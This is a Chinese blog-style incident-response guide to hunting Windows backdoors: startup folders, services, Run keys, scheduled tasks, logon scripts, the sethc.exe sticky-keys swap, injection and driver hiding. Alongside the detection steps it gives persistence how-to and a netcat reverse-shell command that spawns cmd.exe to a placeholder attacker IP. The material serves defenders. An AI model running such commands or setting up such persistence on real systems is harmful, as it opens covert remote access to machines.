600字范文 > 【应急响应】Windows系统下应急响应排查方法（一）

【应急响应】Windows系统下应急响应排查方法（一）

时间：2020-04-09 17:27:17

windows后门排查

windows后门启动方式

1、用户启动目录

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupC:\用户\用户名\AppData\Roaming\Microsoft\Windows\[开始] 菜单\程序\启动

2、系统服务方式启动【修改注册表，注册成某项服务，然后启动】

1、win+R，输入services.msc，打开"服务"面板2、在“服务”面板中查看是否有异常命名的服务项3、右键"属性"可以看到恶意启动项文件名及关闭删除服务项4、注册表中也可以定位到异常服务的启动文件【win+R-->regedit】HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[服务名]\Parameters到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[服务名]之后右键新建一个项，项名称就是Parameters，右键新建一个字符串值为Application，然后数值数据添加可执行文件的路径

3、开机启动项(msconfig)

注册表(regedit)路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunonceHKEY_CURRENT_USER\Software\Micorsoft\Windows\Currentversion\Run【创建一个注册表值】右键创建一个项，然后添加项名称，右键添加一个字符串值（名称自己定），把要启动的文件路径贴入查看是否有异常启动项，如有就进行分析并删除.

4、计划任务启动项

桌面右键“我的电脑”、点击“管理”，找到“计划任务”

在“任务计划程序”中可以看到任务状态，时段内有哪些计划任务在执行.

任务计划程序

|__任务计划程序库 //可以看到所有的计划任务程序.

5、组策略-登录脚本(gpedit.msc)

Win + R，运行中输入"gpedit.msc"打开组策略，计算机配置/用户配置 → Windows设置 → 脚本.一般来说，计算机配置中"启动"与"关机"、用户配置中"登录"与"注销"，默认是不会添加脚本的，如果有，那大概率就是有问题了。

6、程序替换（shift后门）

在系统登录界面，连按5次shift触发粘贴键功能，所以将其替换为cmd.exe，替换之后登录界面连按5次shift将直接唤醒cmd命令框

常见的是替换Shift程序为cmd程序，连续按五下Shift键触发

文件路径：C:\WINDOWS\system32\sethc.exe

实现：将C:\WINDOWS\system32\底下的sethc.exe换成cmd.exe即可

windows后门关键技术

1、反弹程序

攻击机：nc -lvvp 1234受控主机：nc [ip] 1234 -e c:\windows\system32\cmd.exe

2、代码注入【恶意代码注入别的进程，以多加一个线程的方式运行】

• 代码注入是一种向目标进程插入独立运行代码并使之运行的技术，其一般调用CreateRemoteThread() API以远程线程的形式运行插入的代码，亦称为线程注入。• 代码以线程过程（ThreadProcedure）形式插入，而代码中使用的数据则以线程参数的形式插入，即代码和数据是分别注入的

3、DLL注入【Powerful Dllinjor】

• DLL注入技术，一般来讲是向一个正在运行的进程插入/注入代码的过程。我们注入的代码以动态链接库（DLL）的形式存在。DLL文件在运行时将按需加载（类似于UNIX系统中的共享库）。

4、驱动隐藏

• 驱动技术涉及Windows内核操作。在Windows内核中，各种数据（包括文件列表、进程列表• 网络连接等）都是以链表形式存在的，如果将需要隐藏的文件、端口、进程、网络连接从链表上摘掉，那么常规文件管理器、进程管理器等软件就无法查看到。但是操作内核链表需要Ring0级别的程序，这类程序最多的表现形式就是系统的驱动程序（.sys）。